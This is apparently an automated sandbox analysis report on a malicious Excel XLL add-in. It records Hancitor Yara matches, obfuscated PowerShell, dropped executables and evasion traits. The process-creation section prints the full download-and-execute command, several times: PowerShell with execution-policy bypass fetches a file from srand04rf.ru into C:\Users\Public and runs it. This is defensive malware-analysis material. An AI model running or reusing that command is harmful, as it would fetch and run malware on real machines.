Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://tasks.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Malicious sample detected (through community Yara rule)

Source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE	Matched rule: Hancitor Payload Author: kevoreilly
Source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE	Matched rule: Hancitor Payload Author: kevoreilly
Source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE	Matched rule: Hancitor Payload Author: kevoreilly

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\snd32sys.exe

Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\snd32sys.exe

Process Stats: CPU usage > 98%

Detected potential crypto function

Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 1_3_064950B7	1_3_064950B7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04B2E670	2_2_04B2E670
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00643154	16_2_00643154
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0063A1B7	16_2_0063A1B7
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0063C250	16_2_0063C250
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0064920D	16_2_0064920D
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00643386	16_2_00643386
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062D39F	16_2_0062D39F
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00629420	16_2_00629420
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_006435C7	16_2_006435C7
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0065F68B	16_2_0065F68B
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00639707	16_2_00639707
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062D711	16_2_0062D711
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0063C7C0	16_2_0063C7C0
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0065F7AB	16_2_0065F7AB
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0064382C	16_2_0064382C
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0065B830	16_2_0065B830
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062D9BB	16_2_0062D9BB
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00643AA0	16_2_00643AA0
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062CB20	16_2_0062CB20
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0063CBF0	16_2_0063CBF0
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00652C03	16_2_00652C03
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00642CE1	16_2_00642CE1
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062DC82	16_2_0062DC82
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00643D05	16_2_00643D05
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062DF3D	16_2_0062DF3D
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00642F13	16_2_00642F13

Found potential string decryption / allocating functions

Source: C:\Users\Public\snd32sys.exe	Code function: String function: 0062B2C4 appears 61 times
Source: C:\Users\Public\snd32sys.exe	Code function: String function: 0062BBA0 appears 50 times
Source: C:\Users\Public\snd32sys.exe	Code function: String function: 0062B2F8 appears 46 times

PE / OLE file has an invalid certificate

Source: 0708_5355150121.xll

Static PE information: invalid certificate

PE file contains strange resources

Source: snd32sys.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: snd32sys.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Searches for the Microsoft Outlook file path

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Uses 32bit PE files

Source: 0708_5355150121.xll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED

Yara signature match

Source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE	Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE	Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE	Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 00000001.00000003.225595145.0000000006590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000003.224640872.0000000002F76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000002.227307568.0000000002F76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000003.225197640.0000000002F76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.348453730.0000000004B30000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000003.262530252.0000000007E07000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000003.224221003.0000000002F76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000003.225049085.0000000002F76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLL@10/11@4/4

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_01

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{0A2181D0-DD23-4259-8109-9971A9896497} - OProcSessId.dat

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\snd32sys.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\snd32sys.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 0708_5355150121.xll	Virustotal: Detection: 23%
Source: 0708_5355150121.xll	ReversingLabs: Detection: 17%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe'	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source:

Binary string: c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb source: snd32sys.exe, snd32sys.exe.6.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\snd32sys.exe

Unpacked PE file: 16.2.snd32sys.exe.610000.0.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_00613560 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,

16_2_00613560

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .img

PE file contains sections with non-standard names

Source: 0708_5355150121.xll	Static PE information: section name: .img
Source: 0708_5355150121.xll	Static PE information: section name: .ico
Source: 0708_5355150121.xll	Static PE information: section name: .fyjrtr
Source: 0708_5355150121.xll	Static PE information: section name: .rytkrer
Source: 0708_5355150121.xll	Static PE information: section name: .reyery
Source: 0708_5355150121.xll	Static PE information: section name: .txt
Source: 0708_5355150121.xll	Static PE information: section name: .res

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04B212A1 push es; ret	2_2_04B212B0
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062B28D push ecx; ret	16_2_0062B2A0
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062034A push 8BFFFFFFh; ret	16_2_0062034F
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_006208AD push 8BFFFFFFh; ret	16_2_006208B2
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0062BBE6 push ecx; ret	16_2_0062BBF9

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\snd32sys.exe

Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\snd32sys.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\snd32sys.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_00629420 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

16_2_00629420

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
